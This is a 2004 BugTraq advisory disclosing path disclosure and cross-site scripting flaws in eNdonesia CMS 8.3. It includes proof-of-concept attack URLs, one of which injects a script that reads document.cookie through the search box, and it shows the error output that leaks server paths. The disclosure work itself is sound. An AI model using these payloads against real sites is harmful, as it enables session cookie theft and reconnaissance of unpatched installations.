BugTraq
Multiple vulnerabilities in eNdonesia CMS Aug 04 2004 04:00AM
ahmad muammar (y3dips echo or id)


ECHO_ADV_02$2004

------------------------------------------------------------------------
---

Multiple vulnerabilities in eNdonesia CMS

------------------------------------------------------------------------
---

Author: y3dips

Date: August, 2th 2004

Location: Indonesia, Jakarta

Web: http://echo.or.id/adv/adv02-y3dips-2004.txt

------------------------------------------------------------------------
---

Affected software description:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

eNdonesia is a freeware content management system, written in php by Nurcholis.

Homepage: http://www.endonesia.net/

download at : http://www.sourceforge.net/projects/endonesia

Version :

tested on endonesia 8.3

not tested on other/older version but it is possible be the same

------------------------------------------------------------------------
---

Vulnerabilities:

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

A. Full path disclosure:

A1. - all scripts in "mod.php" files are not protected against direct access

Example:

http://localhost/endon/mod.php?mod=1

... and we will see standard php error messages, revealing full path to script:

Warning: main(./mod/1/index.php): failed to open stream: No such file or directory in /var/www/html/endon/mod.php on line 3

Warning: main(): Failed opening './mod/1/index.php' for inclusion (include_path='.:/usr/share/pear') in /var/www/html/endon/mod.php on line 3

A2.

Example:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=%3Cb%3Etest%
3C/b%3

... and we will see standard mysql error messages, revealing full path to script

in module because input character:

http://localhost/endon/mod.php?mod=publisher&op=viewcat&cid=[your chararter]

warning :

Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource

in /var/www/html/endon/mod/publisher/publisher.php on line 101

B. Cross-site scripting aka XSS:

eNdonesia has built-in filtering against XSS exploits, so additional measures must be used

for successful cross-site scripting.

B1 - XSS through unsanitaized user submitted variable in mod.php

http://localhost/endon/mod.php?mod=[XSS Code here]publisher&op=viewcat&cid=1

POC : http://localhost/endon/mod.php?mod=%3Ch1%3Etest-nih-publisher&op=viewcat
&cid=dudul

then the warning is

Warning: main(./mod/

test

Epublisher/index.php): failed to open stream: No such file or directory in /var/www/html/endon/mod.php on line 3 .

..... with "test" in <h1> format

B2. Session ID at search box

http://localhost/endon/mod.php?mod=publisher&op=search&query=

POC :

http://localhost/endon/mod.php?mod=publisher&op=search&query=%3Cscript%3
Ealert(document.cookie)%3C/script%3E

or in search box, input <script>alert(document.cookie)</script>

------------------------------------------------------------------------
---

The fix:

~~~~~~~~

Vendor not contacted yet

but i ll post it to them later

------------------------------------------------------------------------
---

Shoutz:

~~~~~~~

~ echo|staff (m0by, the_day, comex, z3r0byt3, K-159, c-a-s-e, S`to)

~ newbie_hacker (at) yahoogroups (dot) com [email concealed] ,

~ #e-c-h-o@DALNET

------------------------------------------------------------------------
---

Contact:

~~~~~~~~

y3dips || echo|staff || y3dips[at]phreaker[dot]net

Homepage: http://y3dips.echo.or.id/

------------------------------[ EOF ]--------------------------------------

[ reply ]


 

Privacy Statement
Copyright 2010, SecurityFocus